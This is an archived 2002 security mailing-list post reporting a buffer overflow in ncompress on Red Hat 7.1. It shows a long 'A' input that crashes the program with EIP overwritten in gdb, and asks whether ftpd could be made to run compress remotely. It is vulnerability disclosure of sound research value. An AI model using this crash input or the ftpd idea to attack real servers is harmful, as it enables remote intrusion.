compress(vul) + ftpd(?)

From: HypH (hyphenat_private)
Date: Tue Mar 05 2002 - 05:43:06 PST

Next message: VeNoMouS: "Re: Rumours about Apache 1.3.22 exploits"

Previous message: Dragos Ruiu: "cansecwest/core02"
Next in thread: H D Moore: "Re: compress(vul) + ftpd(?)"
Reply: H D Moore: "Re: compress(vul) + ftpd(?)"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

[hyph@port ~]$ rpm -qf `which compress`
ncompress-4.2.4-21
[hyph@port ~]$ compress `perl -e 'print "A" x 1100'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA: File
 name too long
Segmentation fault  (core dumped)
[hyph@port ~]$gdb compress core
[...]
#0  0x41414141 in ?? ()
(gdb) i r
eax            0x461    1121
ecx            0x1      1
edx            0x40158be0       1075153888
ebx            0x41414141       1094795585
esp            0xbffff368       0xbffff368
ebp            0x41414141       0x41414141
esi            0x41414141       1094795585
edi            0x41414141       1094795585
eip            0x41414141       0x41414141 <--- :-))
[...]
[hyph@port ~]$ cat /etc/redhat-release
Red Hat Linux release 7.1 (Seawolf)
[hyph@port ~]$ ls -l `which compress`
-rwxr-xr-x    2 root     root        16156 gru 12  2000 /usr/bin/compress

Compress isn`t suid so it gives us no benefit. And here`s my question:
Is there any way to force the ftpd to 'compress' a file before sending it, 
from the client`s side. I`m asking for this particular daemon because of
this: 

[hyph@port ~]$ ls -l /var/ftp/bin/ 
razem 400k
-r--------    1 root     root          313 sie  2  2001 bin.md5
-rwxr-xr-x    2 root     root          16k gru 12  2000 compress <-- :-))
-rw-------    1 root     root         848k mar  3 10:07 core
-rwxr-xr-x    2 root     root          48k sie  8  2000 cpio
-rwxr-xr-x    4 root     root          49k lut  8  2001 gzip
-rwxrwx--x    2 root     root          45k mar 14  2001 ls
-rwxr-xr-x    2 root     root         147k mar  6  2001 tar

The benefits would be obvious.

Sorry if it`s a known bug/vulnerability (but I`ve never heared `bout it before)

-- 

:::::::::::::::::::::::::::
Linux isn`t unfriendly 
he`s only picky in choosing 
his friends.
:::::::::::::::::::::::::::

Next message: VeNoMouS: "Re: Rumours about Apache 1.3.22 exploits"
Previous message: Dragos Ruiu: "cansecwest/core02"
Next in thread: H D Moore: "Re: compress(vul) + ftpd(?)"
Reply: H D Moore: "Re: compress(vul) + ftpd(?)"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Tue Mar 05 2002 - 09:20:26 PST